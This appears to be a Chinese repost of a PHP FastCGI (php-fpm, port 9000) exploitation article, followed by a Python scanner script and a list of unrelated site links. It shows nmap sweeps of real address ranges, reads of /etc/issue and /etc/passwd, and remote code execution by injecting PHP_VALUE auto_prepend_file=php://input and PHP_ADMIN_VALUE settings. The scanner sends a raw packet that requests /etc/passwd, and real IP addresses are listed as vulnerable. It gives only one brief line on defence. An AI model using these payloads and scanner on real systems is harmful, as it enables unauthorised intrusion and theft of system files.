fastcgi文件读取漏洞之python扫描脚本

PHP FastCGI的远程利用

说到FastCGI，大家都知道这是目前最常见的webserver动态脚本执行模型之一。目前基本所有web脚本都基本支持这种模式，甚至有的类型脚本这是唯一的模式（ROR，Python等）。

FastCGI的主要目的就是，将webserver和动态语言的执行分开为两个不同的常驻进程，当webserver接收到动态脚本的请求，就通过fcgi协议将请求通过网络转发给fcgi进程，由fcgi进程进行处理之后，再将结果传送给webserver，然后webserver再输出给浏览器。这种模型由于不用每次请求都重新启动一次cgi，也不用嵌入脚本解析器到webserver中去，因此可伸缩性很强，一旦动态脚本请求量增加，就可以将后端fcgi进程单独设立一个集群提供服务，很大的增加了可维护性，这也是为什么fcgi等类似模式如此流行的原因之一。

然而正是因为这种模式，却也带来了一些问题。例如去年80sec发布的《nginx文件解析漏洞》 实际上就是由于fcgi和webserver对script路径级参数的理解不同出现的问题。除此之外，由于fcgi和webserver是通过网络进行沟通的，因此目前越来越多的集群将fcgi直接绑定在公网上，所有人都可以对其进行访问。这样就意味着，任何人都可以伪装成webserver，让fcgi执行我们想执行的脚本内容。

ok，以上就是背景原理解释，我这里就用我最熟悉的PHP给各位做个例子。

php的fastcgi目前通常叫做FPM。他默认监听的端口是9000端口。我们这里用nmap直接扫描一下：

nmap -sV -p 9000 --open x.x.x.x/24

为什么要用sV？因为9000端口可能还存在其他服务，这里需要借用nmap的指纹识别先帮我们鉴定一下。

[root@test:~/work/fcgi]#nmap -sV -p 9000 --open 173.xxx.xxx.1/24

Starting Nmap 6.01 ( http://nmap.org ) at 2012-09-14 20:06 EDT
Nmap scan report for abc.net (173.xxx.xxx.111)
Host is up (0.0095s latency).
PORT     STATE SERVICE VERSION
9000/tcp open  ssh     OpenSSH 5.3p1 Debian 3ubuntu7 (protocol 2.0)
Service Info: OS: Linux; CPE: cpe:/o:linux:kernel

Nmap scan report for abc.com (173.xxx.xxx.183)
Host is up (0.0096s latency).
PORT     STATE SERVICE    VERSION
9000/tcp open  tcpwrapped

Service detection performed. Please report any incorrect results at http://nmap.org/submit/ .
Nmap done: 256 IP addresses (198 hosts up) scanned in 7.70 seconds

随便扫描了一下，运气不错，一个C段有2个开放9000端口的，不过其中一个是被管理员修改的sshd，另一个tcpwrapped，才是我们的目标。

为了做测试，我写了一个fastcgi的客户端程序，直接向对方发起请求。我们利用一个开放的fastcgi能有什么作用？这里和普通的http请求有一点不同，因为webserver为了提供fastcgi一些参数，每次转发请求的时候，会通过FASTCGI_PARAMS的包向fcgi进程进行传递。本来这些参数是用户不可控的，但是既然这个fcgi对外开放，那么也就说明我们可以通过设定这些参数，来让我们去做一些原本做不到的事情：

[root@test:~/work/fcgi]#./fcgi_exp read 173.xxx.xxx.183 9000 /etc/issue

X-Powered-By: PHP/5.3.2-1ubuntu4.9
Content-type: text/html www.

Ubuntu 10.04.3 LTS \n \l

读到了/etc/issue文件，可以看到这是台ubuntu 10.04的机器。那又是怎么实现的呢？其实我们只要在FASTCGI_PARAMS中，设定 DOCUMENT_ROOT为"/"根目录即可，随后再设置SCRIPT_FILENAME为/etc/issue。这样，只要我们有权限，我们就可以控制fcgi去读取这台机器上的任意文件了。实际上这并不是读取，而是用php去执行它。

既然是执行，所以其实这个漏洞就类似于一个普通的LFI漏洞，如果你知道这台机器上的log路径，或者任何你可以控制内容的文件路径，你就可以执行任意代码了。

到此为止了么？不，如果利用log或者去猜其他文件路径去执行代码，还是不够方便，有没有更为方便的利用方式可以让我执行任意我提交的代码呢？

这里我也找了很多办法，最先想到的是传递env参数过去然后去执行/proc/self/environ文件，可惜php-fpm在接收到我的参数值后只是在内存中修改了环境变量，并不会直接改动这个文件。因此没法利用。况且这个方式也不是所有系统都通用。

我们还有一种方法，在我之前写的《CVE-2012-1823（PHP-CGI RCE）的PoC及技术挑战》中，可以通过动态修改php.ini中的auto_prepend_file的值，去远程执行任意文件。将一个LFI的漏洞变成了RFI，这样可利用空间就大大增加。

fastcgi是否也支持类似的动态修改php的配置？我查了一下资料，发现原本FPM是不支持的，直到某开发者提交了一个bug，php官方才将此特性Merge到php 5.3.3的源码中去。

通用通过设置FASTCGI_PARAMS，我们可以利用PHP_ADMIN_VALUE和PHP_VALUE去动态修改php的设置。

env["REQUEST_METHOD"] = "POST"
env["PHP_VALUE"] = "auto_prepend_file = php://input"
env["PHP_ADMIN_VALUE"] = "allow_url_include = On\ndisable_functions = \nsafe_mode = Off"

利用执行php://input，然后在POST的内容中写入我们的php代码，这样就可以直接执行了。

[root@test:~/work/fcgi]#./fcgi_exp system 127.0.0.1 9000 /tmp/a.php "id; uname -a"   

X-Powered-By: PHP/5.5.0-dev
Content-type: text/html

uid=500(www) gid=500(www) groups=500(www)
Linux test 2.6.18-308.13.1.el5 #1 SMP Tue Aug 21 17:51:21 EDT 2012 x86_64 x86_64 x86_64 GNU/Linux

细心者会注意到这里有些变化，我换了本机做测试。因为开始发现的那台机器php版本是5.3.2，正好低于5.3.3，因此无法利用修改ini设置去执行代码，只能去猜路径。

另一个变化是，我这里去读取/tmp/a.php这个php文件，而不是去读取/etc/issue。因为在5.3.9开始，php官方加入了一个配置"security.limit_extensions"，默认状态下只允许执行扩展名为".php"的文件。因此你必须找到一个已经存在的php文件。而这个设置是php-fpm.conf里的，无法通过修改ini的配置去覆盖它。如果谁能有更好的办法可以绕过这个限制，请告诉我。

ok，目前为止对php-fpm的所有测试已经结束，我们利用一个对外开放的fcgi进程，已经可以直接获取shell了。各位不如也去研究一下其他fcgi，或许会有更多发现。

如何防止这个漏洞？很简单，千万不要把fcgi接口对公网暴露。同时也希望将来fcgi会有身份认证机制。

任何系统上编译，请安装golang之后，执行：
go build fcgi_exp.go

fastcgi文件读取漏洞python扫描脚本

fastcgi文件读取（代码执行）是个很老的漏洞，漏洞描述： PHP FastCGI 的远程利用

利用该漏洞可读取系统文件，甚至有一定几率成功执行代码。 下载上述文章中提到的： fcgi_exp

协议细节其实我已不关心，只需要一个python的扫描脚本。于是拿wireshark抓了下GaRY的程序，写一小段代码。

外网暴露9000端口的机器自然是非常非常少的，但内网可就说不定了。

import socket
import sys

def test_fastcgi(ip):
  sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM); sock.settimeout(5.0)
  sock.connect((ip, 9000))
  data = """
  01 01 00 01 00 08 00 00 00 01 00 00 00 00 00 00
  01 04 00 01 00 8f 01 00 0e 03 52 45 51 55 45 53 
  54 5f 4d 45 54 48 4f 44 47 45 54 0f 08 53 45 52 
  56 45 52 5f 50 52 4f 54 4f 43 4f 4c 48 54 54 50 
  2f 31 2e 31 0d 01 44 4f 43 55 4d 45 4e 54 5f 52
  4f 4f 54 2f 0b 09 52 45 4d 4f 54 45 5f 41 44 44
  52 31 32 37 2e 30 2e 30 2e 31 0f 0b 53 43 52 49 
  50 54 5f 46 49 4c 45 4e 41 4d 45 2f 65 74 63 2f 
  70 61 73 73 77 64 0f 10 53 45 52 56 45 52 5f 53
  4f 46 54 57 41 52 45 67 6f 20 2f 20 66 63 67 69
  63 6c 69 65 6e 74 20 00 01 04 00 01 00 00 00 00
  """
  data_s = ''
  for _ in data.split():
    data_s += chr(int(_,16))
  sock.send(data_s)
  try:
    ret = sock.recv(1024)
    if ret.find(':root:') > 0:
      print ret
      print '%s is vulnerable!' % ip
      return True
    else:
      return False
  except Exception, e:
    pass
      
  sock.close()


if __name__ == '__main__':
  if len(sys.argv) == 1:
    print sys.argv[0], '[ip]'
  else:
    test_fastcgi(sys.argv[1])

通过快速扫描9000端口，可以发现几个存在漏洞的机器：

110.164.68.137 is vul !
110.164.68.148 is vul !
110.164.68.149 is vul !
110.164.68.151 is vul !
110.164.68.154 is vul !
110.164.68.155 is vul !

fcgi_exp.exe read 110.164.68.137 9000 /etc/passwd

# fastcgi  # 文件读取漏洞  # 使用PYTHON解析Wireshark的PCAP文件方法  # 这是  # 会有  # 就可以  # 中去  # 对外开放  # 这台  # 的是  # 我也  # 几个  # 是个  # 让我  # 在我  # 告诉我  # 你可以  # 大家都  # 让我们  # 也就  # 才是  # 是怎么  # 你知道 

相关文章： 如何在七牛云存储上搭建网站并设置自定义域名？  开心动漫网站制作软件下载,十分开心动画为何停播？  建站为何优先选择香港服务器？  建站之星备案是否影响网站上线时间？  建站之星如何实现网站加密操作？  家庭建站与云服务器建站，如何选择更优？  rsync同步时出现rsync: failed to set times on “xxxx”: Operation not permitted  c# 在ASP.NET Core中管理和取消后台任务  免费视频制作网站,更新又快又好的免费电影网站？  早安海报制作网站推荐大全,企业早安海报怎么每天更换？  北京的网站制作公司有哪些,哪个视频网站最好？  外贸公司网站制作,外贸网站建设一般有哪些步骤？  php能控制zigbee模块吗_php通过串口与cc2530 zigbee通信【介绍】  盐城做公司网站,江苏电子版退休证办理流程？  为什么Go需要go mod文件_Go go mod文件作用说明  如何获取上海专业网站定制建站电话？  如何选择PHP开源工具快速搭建网站？  家具网站制作软件,家具厂怎么跑业务？  如何在宝塔面板中创建新站点？  ,网页ppt怎么弄成自己的ppt？  胶州企业网站制作公司,青岛石头网络科技有限公司怎么样？  如何快速查询网址的建站时间与历史轨迹？  实现点击下箭头变上箭头来回切换的两种方法【推荐】  公众号网站制作网页,微信公众号怎么制作？  如何在Tomcat中配置并部署网站项目？  如何快速重置建站主机并恢复默认配置？  如何通过VPS建站实现广告与增值服务盈利？  广州商城建站系统开发成本与周期如何控制？  网站视频怎么制作,哪个网站可以免费收看好莱坞经典大片？  C#如何使用XPathNavigator高效查询XML  微信h5制作网站有哪些,免费微信H5页面制作工具？  javascript中的try catch异常捕获机制用法分析  香港服务器如何优化才能显著提升网站加载速度？  免费的流程图制作网站有哪些,2025年教师初级职称申报网上流程？  如何在IIS中新建站点并配置端口与IP地址？  官网网站制作腾讯审核要多久,联想路由器newifi官网  如何通过可视化优化提升建站效果？  招贴海报怎么做,什么是海报招贴？  如何在云主机上快速搭建多站点网站？  企业网站制作费用多少,企业网站空间一般需要多大，费用是多少？  javascript基本数据类型及类型检测常用方法小结  如何在建站之星绑定自定义域名？  香港服务器建站指南：外贸独立站搭建与跨境电商配置流程  非常酷的网站设计制作软件,酷培ai教育官方网站？  寿县云建站：智能SEO优化与多行业模板快速上线指南  如何高效配置IIS服务器搭建网站？  建站org新手必看：2024最新搭建流程与模板选择技巧  ui设计制作网站有哪些,手机UI设计网址吗？  如何通过多用户协作模板快速搭建高效企业网站？  如何选择网络建站服务器？高效建站必看指南